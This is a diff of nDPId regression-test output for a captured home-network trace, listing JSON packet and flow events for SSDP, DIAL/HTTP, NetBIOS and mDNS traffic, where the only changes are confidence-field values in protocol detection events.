00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687269716,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48KY4MsCCjHASFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjkgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1569687270260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687270260,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj91AAEARlEMKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1569687270560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687270560,"pkt":"AQBef\/\/6NDY7z3UoCABFAADK9bsAAAERyIoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1569687270729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687270729,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTkARAAEARlBwKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1569687270740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687270740,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA47wm4MsCCkExSFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MzAgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1569687271101,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687271101,"pkt":"LH6BsEqhNDY7z3UoCABFAAAgLGIAAEAROYgKAADjCgAAAc1zAMAADBGuCAEDEA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1569687271764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687271764,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48i24MsCCjOhSFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MzEgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1569687277139,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277139,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgVbYAAEARDvYKAADjCgAA\/wCJAIkATLhJRX8wEAABAAAAAAABIEVNRkFDTkZDRUxFRkZDRkZGQ0NORVBGREZJQ0FDQUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="} 